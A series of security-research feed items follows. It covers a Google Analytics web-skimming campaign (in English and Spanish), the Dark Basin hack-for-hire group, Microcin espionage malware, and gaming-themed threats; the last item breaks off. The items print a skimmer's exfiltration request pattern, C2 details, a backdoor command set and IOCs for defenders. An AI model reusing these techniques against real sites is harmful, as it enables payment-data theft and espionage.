Author: Victoria Vlasova
Link :
Email :
Description: Recently, we identified several cases where Google Analytics was misused: attackers injected malicious code into sites, which collected all the data entered by users, and then sent it via Analytics.
Full content:

Web skimming is a common class of attacks generally aimed at online shoppers. The principle is quite simple: malicious code is injected into the compromised site, which collects and sends user-entered data to a cybercriminal resource. If the attack is successful, the cybercriminals gain access to shoppers’ payment information.

To make the data flow to a third-party resource less visible, fraudsters often register domains resembling the names of popular web services, and in particular, Google Analytics (google-anatytics[.]com, google-analytcsapi[.]com, google-analytc[.]com, google-anaiytlcs[.]com, google-analytics[.]top, google-analytics[.]cm, google-analytics[.]to, google-analytics-js[.]com, googlc-analytics[.]com, etc.). But attack of this kind were also found to sometimes use the authentic service.

To harvest data about visitors using Google Analytics, the site owner must configure the tracking parameters in their account on analytics.google.com, get the tracking ID (trackingId, a string like this: UA-XXXX-Y), and insert it into the web pages together with the tracking code (a special snippet of code). Several tracking codes can rub shoulders on one site, sending data about visitors to different Analytics accounts.

Recently, we identified several cases where this service was misused: attackers injected malicious code into sites, which collected all the data entered by users, and then sent it via Analytics. As a result, the attackers could access the stolen data in their Google Analytics account. We found about two dozen infected sites worldwide. The victims included stores in Europe and North and South America selling digital equipment, cosmetics, food products, spare parts etc.

The screenshot below shows how the infection looks — malicious code with the attacker’s tracking code and tracking ID:

Screenshot 1

The attacker tries to hide their malicious activity using a classic anti-debugging technique. Screenshot 2 shows code for checking whether Developer mode is enabled in the visitor’s browser. The code in the screenshot above is executed only if the result is negative.

Screenshot 2

Curiously, the attackers left themselves a loophole — the option to monitor the script in Debug mode. If the browser’s local storage (localStorage) contains the value ‘debug_mode’==’11’, the malicious code will spring into life even with the developer tools open, and will go as far as to write comments to the console in clumsy English with errors. In screenshot 3, the line with the ‘debug_mode’ check follows the implementation of the RC4 encryption algorithm (used to encrypt the harvested data before sending it).

Screenshot 3

If the anti-debugging is passed, the script collects everything anyone inputs on the site (as well as information about the user who entered the data: IP address, UserAgent, time zone). The collected data is encrypted and sent using the Google Analytics Measurement Protocol. The collection and sending process is shown in screenshot 4.

Screenshot 4

The stolen data is sent by invoking the send event method in the ‘eventAction’ field.

The function signature in this case is:

ga('send', 'event', {
  'eventCategory': 'Category',  //Protocol Parameter: ec; Value type: text; Max Lenght: 150 Bytes
  'eventAction': 'Action',    //Protocol Parameter: ea; Value type: text; Max Lenght: 500 Bytes
  'eventLabel': 'Label'     //Protocol Parameter: el; Value type: text; Max Lenght: 500 Bytes
});

This leads to an HTTP request being sent to the URL
https[:]//www.google-analytics.com/collect?<parameters>&ea=packed_stolen_data&<parameters>

In the above-described case, malicious code is inserted into a script on the infected site in “readable” form. In other cases, however, the injection can be obfuscated. Malicious code also can be downloaded from a third-party resource. Screenshot 5 shows an example obfuscation option. In this variant, a call to a malicious script from firebasestorage.googleapis[.]com is inserted into the infected site.

Screenshot 5

After deobfuscation, we obtain a similar script with the same distinctive comments. Part of its code is presented in screenshot 6 (a different tracking ID is used).

Screenshot 6

What’s the danger

Google Analytics is an extremely popular service (used on more than 29 million sites, according to BuiltWith) and is blindly trusted by users: administrators write *.google-analytics.com into the Content-Security-Policy header (used for listing resources from which third-party code can be downloaded), allowing the service to collect data. What’s more, the attack can be implemented without downloading code from external sources.

How to avoid the issues

Users:

  • Install security software. Kaspersky solutions detect malicious scripts used in such attacks as HEUR:Trojan-PSW.Script.Generic.

Webmasters:

  • Do not install web applications and CMS components from untrusted sources. Keep all software up to date. Follow news about vulnerabilities and take recommended actions to patch them.
  • Create strong passwords for all administration accounts.
  • Limit user rights to the minimum necessary. Keep track of the number of users who have access to service interfaces.
  • Filter user-entered data and query parameters to prevent third-party code injection.
  • For e-commerce sites, it is recommended to use PCI DSS-compliant payment gateways.

IOCs

firebasestorage.googleapis[.]com/v0/b/bragvintage-f929b.appspot.com/o/*
firebasestorage.googleapis[.]com/v0/b/canature-5fab3.appspot.com/o/*
firebasestorage.googleapis[.]com/v0/b/ericeirasurfskate-559bf.appspot.com/o/*
firebasestorage.googleapis[.]com/v0/b/gluten-8e34e.appspot.com/o/*
firebasestorage.googleapis[.]com/v0/b/laser-43e6f.appspot.com/o/*
firebasestorage.googleapis[.]com/v0/b/movile-720cd.appspot.com/o/*
firebasestorage.googleapis[.]com/v0/b/plumb-99e97.appspot.com/o/*
firebasestorage.googleapis[.]com/v0/b/redfox-64c35.appspot.com/o/*
firebasestorage.googleapis[.]com/v0/b/tictoc-9677e.appspot.com/o/*

 

Contributor:
Copyright:
Category: Featured
Date: Mon, 22 Jun 2020 10:00:53 +0000
Local date: Mon, 22 Jun 2020 10:00:53 +0000
Latitude:
Longitude:
Language: en-US
Encoding: UTF-8
Feed type: RSS
itemImageThumbnailUrl:
itemImageWidth: 1200 px
itemImageHeight: 800 px
Web-Skimming con Google Analytics
Author: Victoria Vlasova
Link :
Email :
Description: Hace poco, identificamos varios casos de uso abusivo del Google Analytics: el atacante inyectaba en el sitio web un código malicioso que recopilaba todos los datos introducidos por los usuarios y luego los enviaba utilizando el protocolo de "análisis".
Full content:

El web-skimming es un tipo común de ataques cuyo objetivo suelen ser los visitantes de las tiendas en línea. El principio es bastante simple: en un sitio web hackeado se inyecta un código malicioso que recopila los datos introducidos por el usuario y los envía a un sitio controlado por el atacante. Si el ataque tiene éxito, el atacante responsable de la infección del sitio obtiene los datos de pago de los visitantes.

Para que el envío de datos a un sitio web de terceros sea menos llamativo, los estafadores a menudo registran dominios con nombres parecidos a los de servicios web populares, en particular Google Analytics (google-anatytics[.]com, google-analytcsapi[.]com, google-analytc[.]com, google-anaiytlcs[.]com, google-analytics[.]top, google-analytics[.]cm, google-analytics[.]to, google-analytics-js[.]com, googlc-analytics[.]com,  etc.). Pero logramos establecer que los ataques de este tipo pueden también utilizar el servicio original.

Para recopilar datos sobre los visitantes que utilizan Google Analytics, el propietario del sitio debe configurar los parámetros de seguimiento en su cuenta personal de analytics.google.com, obtener un código de seguimiento (trackingId, una cadena similar a UA-XXXX-Y) e insertar junto con éste un código de seguimiento en las páginas del sitio web. En un sitio web pueden coexistir varios códigos de seguimiento que envían datos sobre los visitantes a diferentes cuentas “analíticas”.

Hace poco, identificamos varios casos de uso abusivo del servicio de Google: el atacante inyectaba en el sitio web un código malicioso que recopilaba todos los datos introducidos por los usuarios y luego los enviaba utilizando el protocolo de “análisis”. Como resultado, el atacante recibía los datos robados en su cuenta de Google Analytics. Descubrimos alrededor de una veintena de sitios infectados en todo el mundo. Entre las víctimas se encuentran tiendas de Europa, América del Norte y del Sur que venden equipos digitales, cosméticos, alimentos y repuestos.

En la captura de pantalla a continuación podemos ver cómo luce la “infección”: código malicioso con un código de seguimiento y el ID de seguimiento del atacante:

Captura de pantalla 1

El atacante intenta ocultar la actividad maliciosa utilizando la clásica técnica anti-depuración. En la captura de pantalla 2, realiza una comprobación para ver si el modo de desarrollador está habilitado en el navegador del visitante. El código en la captura de pantalla anterior se ejecutará solo si se logra pasar la prueba.

Captura de pantalla 2

Es curioso que el atacante haya dejado una laguna: la capacidad de observar el funcionamiento del script en modo de depuración. Si el almacenamiento local del navegador (Local Storage) contiene el valor ‘debug_mode’ == ’11’, el código malicioso funcionará incluso si las herramientas de desarrollador están abiertas e incluso escribirá comentarios en la consola en un inglés rudimentario (con errores). En la captura de pantalla 3, la línea con la prueba ‘debug_mode’ vigila la implementación del algoritmo de cifrado RC4 (que se usa para cifrar los datos recopilados antes de enviarlos).

Captura de pantalla 3

Al completarse la eliminación de errores, la secuencia de comandos recopilará los datos que el usuario ha introducido en el sitio, además de otros como dirección IP, Agente de usuario, zona horaria. Los datos recopilados se cifran y envían utilizando el Protocolo de medición de Google Analytics (Google Analytics Measurement Protocol). El proceso de recopilación y envío se muestra en la captura de pantalla 4.

Captura de pantalla 4

Los datos robados se envían utilizando el llamado del método .sendevent en el campo ‘eventAction’.

La firma de la llamada en este caso es la siguiente:

ga('send', 'event', {
  'eventCategory': 'Category',  //Protocol Parameter: ec; Value type: text; Max Lenght: 150 Bytes
  'eventAction': 'Action',    //Protocol Parameter: ea; Value type: text; Max Lenght: 500 Bytes
  'eventLabel': 'Label'     //Protocol Parameter: el; Value type: text; Max Lenght: 500 Bytes
});

Esto hace que se envíe una solicitud HTTP a la URL
https[:]//www.google-analytics.com/collect?<parámetros>&ea=packed_stolen_data&<parámetros>

En el caso que acabamos de describir, el código malicioso se inserta en uno de los scripts del sitio infectado en una forma “legible”. Sin embargo, en otros casos, la inyección puede usar técnicas de ofuscación. Además, el código malicioso se puede descargar desde un sitio perteneciente a terceros. En la captura de pantalla 5, un ejemplo de la opción ofuscada. En esta variante, en el sitio infectado se ha insertado la llamada de un script malicioso desde firebasestorage.googleapis[.]com.

Captura de pantalla 5

Después de la desofuscación, obtenemos un script similar, con los mismos comentarios característicos. Parte de su código se muestra en la captura de pantalla 6 (donde se usa otro trackingId).

Captura de pantalla 6

¿Cuál es el peligro?

Google Analytics es un servicio extremadamente popular (según BuiltWith, se utiliza en más de 29 millones de sitios) que goza de la confianza de los usuarios: los administradores escriben *.google-analytics.com en el encabezado Content-Security-Policy (utilizado para enumerar los recursos desde los que se puede descargar el código de terceros), lo que permite que este servicio recopile datos. Además, el ataque se puede implementar sin descargar el código “desde otro lado”.

¿Cómo evitar problemas?

Consejos para los usuarios:

  • Instalar software de seguridad. Las soluciones de seguridad de Kaspersky Lab detectan los scripts maliciosos que se utilizan en ataques y les asignan el nombre HEUR:Trojan-PSW.Script.Generic.

Para webmasters:

  • No instalar distribuciones de aplicaciones web y componentes de CMS desde fuentes no confiables.
  • Mantener actualizado el software. Mantenerse atento a las nuevas vulnerabilidades y seguir las recomendaciones para solucionarlas.
  • Crear contraseñas seguras para las cuentas de administración.
  • Limitar los derechos de usuario al conjunto mínimo necesario. Realizar seguimiento del número de usuarios que tienen acceso a las interfaces de servicio.
  • Filtrar los datos y parámetros de consulta que el usuario introduce para evitar la inyección de código de terceros.
  • Para los sitios web de comercio electrónico, es aconsejable utilizar pasarelas de pago que cumplan con los requisitos de PCI DSS.

IOCs

firebasestorage.googleapis[.]com/v0/b/bragvintage-f929b.appspot.com/o/*
firebasestorage.googleapis[.]com/v0/b/canature-5fab3.appspot.com/o/*
firebasestorage.googleapis[.]com/v0/b/ericeirasurfskate-559bf.appspot.com/o/*
firebasestorage.googleapis[.]com/v0/b/gluten-8e34e.appspot.com/o/*
firebasestorage.googleapis[.]com/v0/b/laser-43e6f.appspot.com/o/*
firebasestorage.googleapis[.]com/v0/b/movile-720cd.appspot.com/o/*
firebasestorage.googleapis[.]com/v0/b/plumb-99e97.appspot.com/o/*
firebasestorage.googleapis[.]com/v0/b/redfox-64c35.appspot.com/o/*
firebasestorage.googleapis[.]com/v0/b/tictoc-9677e.appspot.com/o/*

Contributor:
Copyright:
Category: Destacados
Date: Mon, 22 Jun 2020 10:00:14 +0000
Local date: Mon, 22 Jun 2020 10:00:14 +0000
Latitude:
Longitude:
Language: es-ES
Encoding: UTF-8
Feed type: RSS
itemImageThumbnailUrl:
itemImageWidth: 1200 px
itemImageHeight: 800 px
Investigadores exponen detalles sobre las operaciones de los hackers “en alquiler” de Dark Basin
Author: Securelist
Link :
Email :
Description: Un equipo de investigadores de seguridad informática ha sacado a la luz una operación de hackers “en alquiler” que prestaron sus servicios para elaborar decenas de miles de ataques dirigidos a individuos a cambio de dinero. Se descubrió que la… Leer el artículo completo
Full content:

no-image

Un equipo de investigadores de seguridad informática ha sacado a la luz una operación de hackers “en alquiler” que prestaron sus servicios para elaborar decenas de miles de ataques dirigidos a individuos a cambio de dinero. Se descubrió que la operación, conocida como Dark Basin, se coordinó desde India para espiar y atacar por encargo a activistas, políticos, periodistas y empresarios.

El grupo de investigadores canadienses Citizen Lab investigó la operación conocida como Dark Basin que, según la Universidad de Toronto, realizaba “espionajes comerciales a pedido de sus clientes contra oponentes involucrados en asuntos públicos, casos criminales, transacciones financieras, periodismo y activismo”.

Las investigaciones de Citizen Lab lo llevaron a rastrear el origen de las amenazas a India, encontrando vínculos con una empresa llamada BellTroX InfoTech Services. La compañía ha negado su participación en los ataques.

Los investigadores descubrieron que, a lo largo de los últimos siete años, los cibercriminales a cargo de Dark Basin habían enviado 10.000 correos electrónicos fraudulentos para atacar a ciudadanos. Los correos electrónicos engañaban a sus destinatarios con la intención de instalar en sus equipos programas espía que robaban y filtraban la información almacenada en sus equipos.

Citizen Lab dijo que había comenzado su investigación a partir del ataque a un periodista. Al notar que las tácticas usadas eran “descuidadas”, los atacantes pudieron profundizar sobre su funcionamiento, orígenes y posibles víctimas. Según los investigadores, los hackers usaban documentos personales, incluyendo Currículum Vitaes cuando ponían a prueba sus URL cortos. También hicieron publicaciones en redes sociales tomando crédito por las técnicas de ataque y evidenciándolo con capturas de pantalla de la infraestructura de Dark Basin”.

Asimismo, los nombres que se incluían en algunos de los servicios para acortar URLs de Dark Basin estaban relacionados con nombres de festivales en India, y muchas de las marcas de tiempo de los correos fraudulentos tenían correlación con las horas de trabajo de la zona horaria de India.

Los investigadores han publicado un listado de las compañías que fueron afectadas y accedieron a hacer esto de conocimiento público. Entre ellas se encuentran: el Fondo Familiar Rockefeller, Centro de Investigaciones del Clima, Centro Greenpeace Center de Leyes Nacionales y Medioambientales, Oil Change International, Union of Concerned Scientists, etc.

A partir de la exposición de esta información, se eliminó el sitio web de BellTroX y se ha quitado de la red el material que vinculaba a la firma con las operaciones criminales.

Fuentes
Researchers unmask Indian ‘infosec’ firm to reveal hacker-for-hire op that targeted pretty much anyone clients wanted • The Register
Toronto’s Citizen Lab uncovers massive hackers-for-hire organization ‘Dark Basin’ that has targeted hundreds of institutions on six continents • Financial Post
Massive Hack-for-Hire-Service Exposed • Computer Business Review

Contributor:
Copyright:
Category: News
Date: Fri, 19 Jun 2020 14:32:25 +0000
Local date: Fri, 19 Jun 2020 14:32:25 +0000
Latitude:
Longitude:
Language: es-ES
Encoding: UTF-8
Feed type: RSS
itemImageThumbnailUrl:
itemImageWidth: px
itemImageHeight: px
Microcin is here
Author: Denis Legezo
Link :
Email :
Description: In February 2020, we observed a Trojan injected into the system process memory on a particular host. The target turned out to be a diplomatic entity. We attribute this campaign with high confidence to the SixLittleMonkeys (aka Microcin) threat actor.
Full content:

In February 2020, we observed a Trojan injected into the system process memory on a particular host. The target turned out to be a diplomatic entity. What initially attracted our attention was the enterprise-grade API-like (application programming interface) programming style. Such an approach is not that common in the malware world and is mostly used by top-notch actors.

Due to control server reuse (Choopa VPS service), target profiling techniques and code similarities, we attribute this campaign with high confidence to the SixLittleMonkeys (aka Microcin) threat actor. Having said that, we should note that they haven’t previously applied the aforementioned coding style and software architecture. During our analysis we didn’t observe any similar open source tools, and we consider this to be the actor’s own custom code.

To deliver a new network module with a coding style that we consider enterprise-grade, Microcin used steganography inside photos, including this one of a sock (payload removed here)

SixLittleMonkeys’ sphere of interest remains the same – espionage against diplomatic entities. The actor is still also using steganography to deliver configuration data and additional modules, this time from the legitimate public image hosting service cloudinary.com. The images include one related to the notorious GitLab hiring ban on Russian and Chinese citizens. In programming terms, the API-like architecture and asynchronous work with sockets is a step forward for the actor.

Why we consider the current software architecture interesting

By “enterprise-grade API-like programming style” we mean, firstly, asynchronous work with sockets. In terms of Windows user-space entities, it was I/O completion ports. In the OS kernel space, this mechanism is actually a queue for asynchronous procedure calls (APC). We believe there’s a reason for using it in backend applications on the high-loaded server-side. Obviously, however, neither client-side software nor Trojans of this kind need this server-side programming approach. So, it looks to us like the developers have applied some habits from server-side programming.

Secondly, the exported function parameters in the injected library look more like an API: the arguments are two callback functions – encryptor/decryptor and logger. So, if the authors decide to change encryption or logging algorithms, they could do so easily without even touching the network module. Once again, even targeted malicious samples rarely take such architectural issues into consideration.

Another injected library’s exported function parameter is the host name. If the caller doesn’t pass the infected host name as this parameter, the following commands will not be executed. It filters out all messages to other hosts.

Initial infection

Module features File name Detection time
Backdoor sideloaded by legit GoogleCrashHandler version.dll 2019.12.31
Downloader/decryptor inside spoolsv.exe address space spoolsv.dll 2020.01.16
Bitmap picture with steganography inside Random .bmp name 2020.01.16
Network module in the same spoolsv.exe address space Module.dll 2020.01.16

Infection timeline

The backdoor is started by GoogleCrashHandler.exe, due to .dll search order hijacking (version.dll). Bitmap files with a steganography downloader and decryptor (spoolsv.dll), injected into the spoolsv.exe API-like network module, are injected into the same system process.

Let’s cover the modules one at a time. Our telemetry shows that another Microcin backdoor was already on the host before this new network module. It’s most probably a reinfection with newer malware.

Backdoor MD5 File name Compilation timestamp Size
c9b7acb2f7caf88d14c9a670ebb18c62 version.dll 2020.05.20 02:37:58 407552

This UPX packed .dll was executed with the legitimate GoogleCrashHandler.exe (very common library search order hijacking) just before the New Year. The compilation timestamp is obviously spoofed. In this case we don’t know how the backdoor, along with the legitimate application, was delivered.

We won’t concentrate on this backdoor in this report, because it’s fairly typical for Microcin. We just want to emphasize that the timeline above shows it existed on the host before the analyzed module.

Downloader/decryptor

The campaign in question starts with the 64-bit spoolsv.dll downloader/decryptor module that has to be loaded by spoolsv.exe into its address space.

Downloader/decryptor MD5 Modified time Size Build Target ID
c7e11bec874a088a088b677aaa1175a1 2020.03.04 12:20:13 155291 20200304L02f @TNozi96
ef9c82c481203ada31867c43825baff4 2019.10.15 11:46:04 145233 20200120L03o @TNozi96
1169abdf350b138f8243498db8d3451e 2019.01.25 04:58:15 150195 20191119L 123456

So far, we have registered three samples of this module. The file tails contains the following encrypted configuration data.

Parameter Length (bytes) Possible values
.bmp URL len 4 82
.bmp URL .bmp URL len http://res.cloudinary.com/ded1p1ozv/image/upload/v1579489581/<random_name>.bmp
Sleep time 2 17211 and other non-round random numbers
Module build length 4 15
Module build Module build length Date based on the previous table
Target ID length 4 9
Target ID Target ID length Readable strings from the previous table
Random ASCII chars 16 Randomly generated on host
Hardcoded canary 4 0x5D3A48B6

We have published the source code of our decryptor for Microcin’s configuration and steganography at https://github.com/dlegezo/common.

The bitmap URL serves to download the image (like the one with the sock shown above) with the next stage network module. The module build, target ID and random ASCII chars are for the next network module, which includes them in the control server communications.

To get the bitmap, the downloader sends an HTTP GET request to cloudinary.com. The steganography is inside the color palette part of the .bmp file. A typical decryption algorithm includes four stages:

  1. Combine neighboring half bytes into one byte
  2. Decrypt data length with custom XOR-based algorithm
  3. Decrypt six-byte XOR key for main data
  4. Decrypt data itself using decrypted length and key

Besides the configuration data and steganography, the same algorithm is used for the C2 traffic. As we mentioned, due to the malware architecture, the latter can easily be changed. Encryption is XOR-based, but the key scheduling is quite specific and tricky. In the corresponding appendix we provide the part of the decryptor containing the algorithm.

Bitmap images and steganography

Besides the sock image, the campaign operators use more social-oriented photos (payload removed here). The background here is the GitLab hiring ban on Russian and Chinese citizens

So far, we have registered four different images. The encrypted content in all cases are PE files with the following network module and C2 domain for the files. This is the only parameter that comes from bitmap; all others are provided by the downloader.

Image content C2 domain Network module MD5
Sock in washing machine apps.uzdarakchi[.]com 445b78b750279c8059b5e966b628950e
Two people in hoodies forum.mediaok[.]info 06fd6b47b1413e37b0c0baf55f885525
GitLab hiring ban forum.uzdarakchi[.]com 06fd6b47b1413e37b0c0baf55f885525
Woman with child, militaries owa.obokay[.]com 06fd6b47b1413e37b0c0baf55f885525

Network in-memory module

The downloader decrypts the configuration data and C2 domain from the bitmap and then everything is ready to start the last stage inside the same spoolsv.exe virtual address space. We consider the architectural approach in this module to be the most interesting part of the chain.

The network module’s entry point is the exported function SystemFunction000() with multiple arguments. As a beacon, the Trojan prepares an HTTP POST request with the target’s fingerprinting data. And a lot of the parameters become part of the request.

Exported function argument Parameter meaning
Target host name This has to be the same as the infected machine host name. Only then will the Trojan start and receive commands. Initialized by the downloader
Target ID We already enumerated these readable ASCII strings from the decrypted downloader’s config, e.g., @TNozi96
Build version Inside these readable ASCII strings the dates are clearly mentioned. The C2 uses them to understand which build it’s currently working with
WORD field of fingerprint structure Initialized with 0x4004 by the downloader. We don’t have enough data to describe this field’s meaning
C2 IP address and port number The coordinates of the C2, initialized from the decrypted bitmap image
ASCII string in fingerprint structure Unique random string generated by the downloader
BYTE to fingerprint structure Initialized with 0x4004 by the downloader. We don’t have enough data to describe this field’s meaning
Half of maximum sleep time Sleep time before the working cycle. Half because the full time is counted <this arg> + <random>%<this arg>. It’s effectively a maximum of a maximum sleep time
Logger address First callback function address. In this case it’s a logger function inside the downloader
Encryptor/decryptor address Second callback function address. In this case it’s an encryptor/decryptor function inside the downloader

The last two arguments illustrate why we call the network module API-like: any encryption and logging routine could be used without even touching the module code. We consider this programming approach as scalable and useful for large systems. Let’s take a look at these two callback arguments.

Callback and its arguments Callback features
Logger takes ASCII string as a log message Logger function whose parameter is the message text. In this module all the messages are shortenings like “LIOO”, “RDOE”, etc.
Encryptor/decryptor to deal with the traffic between host and C2, takes its length, encryption key, and the flag (0 to encrypt and 1 to decrypt) as argument data Encryptor/decryptor function first used to encrypt beacon with target’s fingerprint. It then decrypts C2 command structures and encrypts replies to them

The module uses the Windows API function WSAIoctl() – something rarely seen in malware – to get the ConnectEx() address and sends a prepared request. Another Windows API function, GetQueuedCompletionStatus(), is in charge of asynchronous work with I/O. In other words, the malware uses I/O completion ports for Windows user-space entities, which is effectively an APC queue in the OS kernel.

The same data structure is used for both sides of the communication: from host to C2 and back. Let’s describe its main fields here.

Field Features
Command code One byte in the structure is the command code, which could vary from 0x00 to 0x16 (22). We describe the main network module commands in the table below
Error code Another byte is used for the error code
Command argument The main command field that takes all the necessary strings, etc. and also keeps fingerprinting data in the case of the beacon

So far, we have described the infection chain, module architecture, custom encryption and HTTP POST-based C2 communication protocol. Last, but not least, is the command set shown in the table below.

Command code Command features
3 Check if target’s ID meets the parameter
4 List logical drives
5 List files
6 Create directory
7 Remove directory
8 Copy file
9 Move file
10 Delete file
11 Execute PE
12 Execute Windows shell command
14 Terminate program
15 File download
16 Read from downloaded file
17 File upload
18 Write to file
19 Stop
20 Sleep

Infrastructure

Domain IP First seen ASN
apps.uzdarakchi[.]com 95.179.136[.]10 November 11, 2019 20473
forum.uzdarakchi[.]com 172.107.95[.]246 February 7, 2020 40676
forum.mediaok[.]info 23.152.0[.]225 March 19, 2020 8100
owa.obokay[.]com N/A (now parked)

To sum up

This time the Microcin campaign has made an interesting step forward, not in terms of a fancy initial infection vector, but as programmers. The API-like network module is much easier to support and update. This improvement is not only about anti-detection or anti-analysis; it’s about software architecture and a step towards a normal non-monolithic framework implementation.

IoC

Downloader
ef9c82c481203ada31867c43825baff4
1169abdf350b138f8243498db8d3451e
c7e11bec874a088a088b677aaa1175a1

Network module
f464b275ba90b3ba9d0a20b8e27879f5
9320180ef6ee8fa718e1ede01f348689
06fd6b47b1413e37b0c0baf55f885525
625a052ddc80efaab99efef70ba8c84f

Domains and IPs
95.179.136.10
apps.uzdarakchi[.]com
forum.uzdarakchi[.]com
forum.mediaok[.]info
owa.obokay[.]com

Contributor:
Copyright:
Category: APT reports
Date: Fri, 19 Jun 2020 10:00:10 +0000
Local date: Fri, 19 Jun 2020 10:00:10 +0000
Latitude:
Longitude:
Language: en-US
Encoding: UTF-8
Feed type: RSS
itemImageThumbnailUrl:
itemImageWidth: 1000 px
itemImageHeight: 563 px
¿Ciberpiratas juegan ciberjuegos durante la cuarentena?
Author: Maria Namestnikova
Link :
Email :
Description: Gracias a la pandemia de Coronavirus, el rol de Internet en nuestras vidas ha sufrido cambios, incluyendo algunos irreversibles. Algunos de estos cambios son definitivamente para bien, otros no son muy buenos, pero casi todos, de alguna manera, impactan en la seguridad digital. Decidimos echarle un vistazo más profundo a estos cambios a través del prisma de la seguridad de la información, comenzando con la industria de los juegos de video.
Full content:

Gracias a la pandemia de Coronavirus, el rol de Internet en nuestras vidas ha sufrido cambios, incluyendo algunos irreversibles. Algunos de estos cambios son definitivamente para bien, otros no son muy buenos, pero casi todos, de alguna manera, impactan en la seguridad digital.

Decidimos echarle un vistazo más profundo a estos cambios a través del prisma de la seguridad de la información, comenzando con la industria de los juegos de video.

Principales hallazgos:

  • El número diario de intentos bloqueados de visitar sitios maliciosos relacionados con juegos, o de navegar hacia ellos desde sitios (o foros) relacionados con juegos, aumentó en un 54% en abril, en comparación con enero de este año. En mayo vimos una disminución en la tendencia de este indicador: -18% en comparación con abril.
  • El número de intentos bloqueados de visitar sitios de phishing dedicados a explotar el tema de los juegos en líena ha aumentado. En particular, el número de notificaciones provenientes de sitios falsos de plataformas de juegos Steam se incrementó en un 40% entre febrero y abril.
  • Los atacantes usan Minecraft, Counter-Strike: Global Offensive y The Witcher 3: Wild Hunt con frecuencia.
  • Los usuarios más atacados son de Vietnam (7,9%), Argelia (6,6%), Corea (6,2%), Hungría (6,2%) y Rumania (6%)

Juguemos mientras el jefe no nos ve

Las cifras provenientes de varias fuentes muestran que la pandemia ha ocasionado un significativo aumento en las actividades de los jugadores. Según gameindustry.biz, las ventas de juegos, tanto para computadoras como para consolas, aumentaron notablemente en marzo.

Aumento en las ventas de juegos entre el 16 y el 22 de marzo. Fuente: gamesindustry.bizIn (descargar)

En abril, la cantidad de descargas, y de jugadores simultáneos en línea, de Steam alcanzó niveles inéditos. El gráfico de actividad de los usuarios de Steam (tanto al jugar como solo al instalar el cliente) (Steam Database) muestra que el 4 de abril se alcanzó el pico de actividades. Después, esta actividad comenzó a disminuir, aunque paulatinamente. Además, los gráficos de actividad de los jugadores son notablemente diferentes de los usuales: los periodos de inactividad son menos pronunciados que en los días normales previos a la cuarentena, y los picos duran menos.

Número de usuarios de Steam por día. Fuente: steamdb.info

Todos estos datos son totalmente comprensibles. Primero, la gente tiene más tiempo libre para jugar. Los datos recopilados por Nielsen Games, como parte de su encuesta regular entre sus usuarios, confirman esta tesis:

Aumento del tiempo que los jugadores dedican a juegos de video en diferentes países. Fuente: Hollywood ReporterSecond (descargar)

Aparentemente, no todos los que querían pasar su tiempo con los juegos de video tenían una computadora en casa para hacerlo. Es eso lo que podemos inferir de los datos estadísticos sobre el hardware que Stream publica en su sitio. Si observamos con detenimiento los gráficos sobre tarjetas de video que usan los usuarios de Steam, notaremos un cambio evidente en los datos de las tarjetas de video, que eran completamente planos antes de marzo de 2020. Hasta ahora, la proporción entre los porcentajes de las tarjetas de video Nvidia, Intel y AMD se han mantenido en el mismo nivel. Desde el inicio de la cuarentena, la proporción de las tarjetas de video Intel y AMD ha crecido de forma pronunciada. Este crecimiento, que estuvo dentro del 2%, podría parecer insignificante si olvidamos que Steam tiene más de 20 millones de usuarios. Es decir, la cantidad adicional de dispositivos con tarjetas gráficas Intel y AMD significaron cientos de miles de computadoras. Dadas las especificaciones de tarjetas de video de distintas marcas, podemos suponer con certeza que estos cientos de miles de equipos son computadoras portátiles empresariales que llegaron a casa durante la cuarentena y en los que los usuarios instalaron Steam sabiendo que el jefe no podía verlos.

Fuente: steampowered.com

Esto también queda confirmado con las repentinas fracturas en los gráficos que muestran la tasa de los procesadores Intel y AMD (Intel también aumentó desde el principio de la cuarentena); y los procesadores usados por los jugadores en términos de la cantidad de núcleos (los procesadores de 4 y de 2 núcleos mostraron un inusual aumento de este porcentaje):

Fuente: steampowered.com

¿Jugamos con los piratas?

El aumento en el número de jugadores y del tiempo que dedican a los juegos en línea, por supuesto que no pasó desapercibido para los ciberpiratas. Los jugadores hace mucho que son blanco de los ataques de los ciberpiratas, cuyo principal interés son los inicios de sesión y en las contraseñas de las cuentas de juegos. Ahora, con la conexión de las computadoras empresariales a las redes domésticas, y viceversa, con el ingreso de computadoras particulares en las redes empresariales que en su mayoría no estaban preparadas para ello, los ataques contra los jugadores se están convirtiendo no solo en una forma de llegar al bolsillo de los usuarios individuales, sino también de acceder a infraestructuras corporativas. En los cinco primeros meses de 2020, la cantidad de vulnerabilidades encontradas en Steam ya superó a la de aquellas descubiertas en cualquiera de los años anteriores. Este hecho, entre otros, indica el creciente interés por encontrar estas vulnerabilidades.

Fuente: cve.mitre.org (descargar)

No olvidemos que también a fines de abril de 2020, Valve confirmó la filtración del código fuente de los conocidos juegos en red CS: GO y Team Fortress 2. Es muy probable que los atacantes estén examinando dichos códigos en busca de vulnerabilidades que sirvan a sus objetivos. Es importante comprender que no se trata de juegos fuera de línea, sino de juegos en línea que requieren de una conexión constante a los servidores y de actualizaciones frecuentes. Esto hace que los usuarios sean más vulnerables aún, ya que sus equipos están, obviamente, siempre en línea, y los jugadores siempre están prestos a instalar una “actualización” con tal de no dejar de jugar. Pero incluso si no cuentan con sus ataques técnicamente complejos que usan vulnerabilidades de día cero, los ciberpiratas gozan de un amplio campo para sus actividades. A partir de que la industria de los juegos en línea está experimentando un aumento inesperado en la cantidad de jugadores, los ciberpiratas han diseñado ataques con “poder aumentado” para explotar el tema de los juegos de una u otra forma. El siguiente paso lógico de los atacantes era incrementar la cantidad de ataques de phishing. Kaspersky AntiPhishing y Kaspersky Security Network (KSN) confirman este hecho. En comparación con febrero, ha aumentado llamativamente la cantidad de clics en los mil sitios más populares de phishing que contienen la palabra “Steam” como parte de su nombre. Este aumento llegó a su pico en abril.

Aumento en el número de clics en sitios de phishing relacionados con temas de Steam en febrero de 2020. Fuente: Kaspersky Security Network (descargar)

Vemos un claro incremento en los datos de las detecciones del antivirus web de sitios con nombres que explotan el tema de los juegos en su conjunto; por ejemplo, que contienen los nombres de conocidos juegos de video o de plataformas de juegos.

Cantidad de ataques web que usaron temas de juegos, entre enero y mayo de 2020. Fuente: KSN (descargar)

Se ha propagado una amplia variedad de programas maliciosos mediante enlaces maliciosos de este tipo: desde malware diseñado para el robo de contraseñas hasta programas secuestradores y mineros. Como siempre, crean versiones gratuitas, actualizaciones o complementos gratuitos para los juegos más conocidos, además de programas estafadores. Se observa un escenario similar entre los archivos maliciosos con nombres relacionados con juegos para no llamar la atención.

Amenazas locales que usan temas relacionados con juegos como camuflaje

